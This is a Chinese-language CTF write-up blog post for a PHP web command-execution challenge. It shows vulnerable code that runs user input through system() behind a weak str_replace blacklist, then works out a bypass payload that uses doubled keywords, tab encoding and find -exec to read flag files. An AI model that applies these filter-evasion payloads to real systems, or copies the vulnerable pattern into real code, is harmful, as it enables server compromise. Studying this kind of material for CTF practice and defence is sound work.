Web命令执行

已于 2023-07-07 20:23:52 修改
阅读量202 收藏
点赞数
分类专栏: CTF 文章标签: 计算机网络 经验分享 笔记 学习方法
于 2023-07-07 20:19:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45906533/article/details/131603749
版权

Web RCE

源代码

<?php 
if(isset($_GET['cmd'])){
        $cmd=$_GET['cmd'];
}else{
        show_source(__FILE__);
        die();
}
$blacklist = array(';', '|', '*', '?', '.', '&', '`', '%', '(', ')', 'cat', 'ls', 'flag',' ');
foreach ($blacklist as $word) {
    $cmd = str_replace($word, '', $cmd);
}
system($cmd);
?>

代码分析:

  • 判断cmd是否为空,然后返回网页源代码
  • blacklist是一个数组,里面的值,用来丢给str_replace函数进行替换操作
  • 如果cmd里面的值在blacklist里面,那么就会被替换为空

根据上面的分析我们可以得知,如果想要执行命令,我们需要绕过str_replace函数

像这种替换操作,如果是字符串我们正常可以双写绕过,我们先看看可以执行哪些命令

在这里插入图片描述
命令执行成功,那么我们使用ls看看当前目录下有什么文件,注意lsblacklist里面,所以要双写绕过一下
在这里插入图片描述
可以看到flag.php了,那么接下来肯定是需要查看它里面的文件内容了

常规查看命令:cat flag.php
从上面的blacklist里面,可以得知,cat,空格,flag,“.” 都被过滤了

  • cat 双写
  • 空格 %09(tab)
  • flag 双写
  • “.” 可以使用不指定文件名就可以查看文件内容的命令

最终payload

find%09/var/www/html%09-maxdepth%091%09-type%09f%09-exec%09cacatt%09{}%09\%2b

解码后的

find	/var/www/html	-maxdepth	1	-type	f	-exec	cacatt	{}	\+

本来这个命令是以;结尾的,但是被禁了,所以我们可以用+号代替(注意+一定要编码)

得到flag
在这里插入图片描述

Ten^v^
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
网页采用命令行方式调用exe
06-02
网页通过命令行方式调用控制台exe。内包含html测试demo,以及exe调用动态库及处理命令行参数的工程。
web安全防护命令执行课件PPT
最新发布
11-21
web安全防护命令执行课件PPT,命令执行命令注入的区别,命令注入的原理,命令注入的DWA实验操作。以及命令执行的总结。
在PHP中执行系统外部命令
01-21
PHP作为一种服务器端的脚本语言,象编写简单,或者是复杂的动态网页这样的任务,它完全能够胜任。但事情不总是如此,有时为了实现某个功能,必须借助于操作系统的外部程序(或者称之为命令),这样可以做到事半功倍。 那么,是否可以在PHP脚本中调用外部命令呢?如果能,如何去做呢?有些什么方面的顾虑呢?相信你看了本文后,肯定能够回答这些问题了。 是否可以? 答案是肯定的。PHP和其它的程序设计语言一样,完全可以在程序内调用外部命令,并且是很简单的:只要用一个或几个函数即可。 前提条件 由于PHP基本是用于WEB程序开发的,所以安全性成了人们考虑的一个重要方面。于是PHP的设计者们给PHP加了一个门:安全模
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
命令执行Web服务
10-20
1.了解Web服务的处理指令 2.掌握WSDL和CSC工具的使用 3.了解服务引用和Web引用的区别 4.熟悉WebServices属性
CTF中web命令执行知识点
cutesharkl的博客
07-08 650
命令注入:命令注入是一种常见的命令执行漏洞,攻击者可以通过将恶意命令注入到应用程序中的用户输入来执行系统命令命令执行的原理:命令执行漏洞通常发生在应用程序未正确过滤、验证或转义用户输入的情况下。输入验证与过滤:对于用户输入,应该进行必要的验证和过滤,以防止恶意输入进入命令执行函数。操作系统命令命令执行漏洞通常发生在应用程序中执行操作系统命令的函数上。绕过技巧:在实际的命令执行漏洞利用中,可能需要使用一些技巧来绕过安全机制。操作系统特定命令命令执行漏洞也可能与特定的操作系统相关。
web-命令执行
qq_60518252的博客
01-21 682
2.2 rce中常用的包含文件函数 include highlight_file 1)highlight_file函数 (别名:show_source) 对文件进行 PHP 语法高亮显示,语法通过使用 HTML 标签进行高亮; 当使用该函数时,整个文件都将被显示,包括密码和其他敏感信息! highlight_file(string $filename, bool $return = false): mixed (highlight_file(filename,return)) ...
php执行cmd/shell命令 木马小后门
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
09-03 4291
php执行shell命令,可以使用下面几个函数: string system ( string $command [, int &$return_var ] ) string exec ( string $command [, array &$output [, int &$return_var ]] ) void passthru ( string $command [, int &$return_var ] )  注意的是:这三个函数在默认的情况下,都是被禁止.
web中常用操作
weixin_31449201的博客
06-01 1003
1.接收浏览器的请求报文self.request = socket_con.recv(4096).decode()if self.request: # 如果收到 # 将请求报文这整个字符串,截取成一行一行的字符串,存储到request_lines这个列表中 request_lines = self.request.split("\r\n") ...
webkubectl:在Web浏览器中运行kubectl命令
02-03
Web Kubectl-在Web浏览器中运行kubectl命令目标Web Kubectl可帮助您管理kubernetes凭据并在Web浏览器中运行kubectl命令,因此您不必在本地PC或某些其他服务器上安装kubectl,此外,Web Kubectl可用于团队。...
Django Ajax 实现Web命令执行
CSDN
11-05 7423
实现Django和Ajax结合的WebSSH(Web-based Secure Shell)应用程序需要一些步骤。WebSSH允许用户通过Web界面访问SSH终端。以下是一些简化的例子,演示如何在Django中使用Ajax轮询实现WebSSH。
WEB页面执行shell命令
Jun626的博客
01-12 2176
无法执行复杂的脚本命令,如带有" |等特殊符号的命令无法执行,如yum、top命令执行结果不完整、仅适用于简单带输出脚本命令,脚本运行账号为apache。限制用户访问cgi-bin目录,修改/etc/httpd/conf/httpd.conf。5.cgi-bin目录执行shell脚本格式。配置http页面账号密码访问,也可实现安全性。上面是我的微信和QQ群,欢迎新朋友的加入。注意修改代码中ip,更改为服务器ip或域名。记得给执行权限,chmod a+x *需要配置一下apache2。测试:在浏览器中输入。
Web执行服务器的命令和脚本
Candyz7的博客
08-16 1430
在定义环境的时候,就尽量定义的通用一些,规律一些。这样可以维护一些通用脚本,通过传入变量参数来做动作。使在服务器中环境维护和定位问题都不再繁琐。​。
web网页相关的几个命令
尘埃落定
06-14 1518
1、wget wget URL 【选项】 【选项】: o : 将下载的内容以指定的文件保存; t : 可以指定在放弃下载之前尝试多少次; 后面接次数 –limit-rate 带宽 :限制下载占用带宽; -Q 配额大小: 指定最大下载配额quota ; -c :断点续传 –mirror : 复制整个网站(即镜像) –user username --password pass ...
web安全之命令注入
weixin_54584489的博客
04-13 679
命令注入漏洞即web应用程序使用了可以操控相关系统命令的功能,又没有对用户输入进行过滤,导致攻击者可以通过拼接输入而执行系统命令
命令执行web入门
2201_75316477的博客
12-30 1380
我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母。如果对取反不了解可以百度一下,这里给个容易记得式子,如果对a按位取反,则得到的结果为-(a+1),也就是对0取反得到-1。其中%09,%26不受数字被过滤的影响,因为在加载时%09,%26会被解码为空格和分号,也就没有了数字。过滤了冒号,不能用伪协议了,没有过滤英文状态的**()** 和**;这下好了,过滤了字母,但是数字没有过滤,数字?
Web漏洞-命令执行和代码执行漏洞
Ays.Ie的博客
03-13 1765
该篇描述了web漏洞-命令执行和代码执行漏洞
web安全-命令执行
qq_59350385的博客
02-23 3269
一、背景介绍 程序员使用脚本语言开发应用的过程中,脚本语言的开发十分快速,但是也伴随着一些问题。比如速度慢。如果我们开发的应用 ,特别是企业级的一些应用就需要去调用一些外部程序。当web应用需要调用一些外部程序是时就会用到一些执行系统命令的函数。 二、漏洞成因 应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令执行,在没有过滤的情况下就会造成命令执行漏洞。 三、相关函数 system(args)有回显 ...
web命令执行常见绕过方式
07-10
常见的Web命令执行绕过方式包括: 1. 输入过滤:攻击者可能会尝试通过绕过输入过滤来执行命令。他们可能会使用特殊字符、编码或其他技术来绕过输入验证。 2. 输入截断:攻击者可能会尝试通过在输入中插入特殊字符...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ten^v^

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值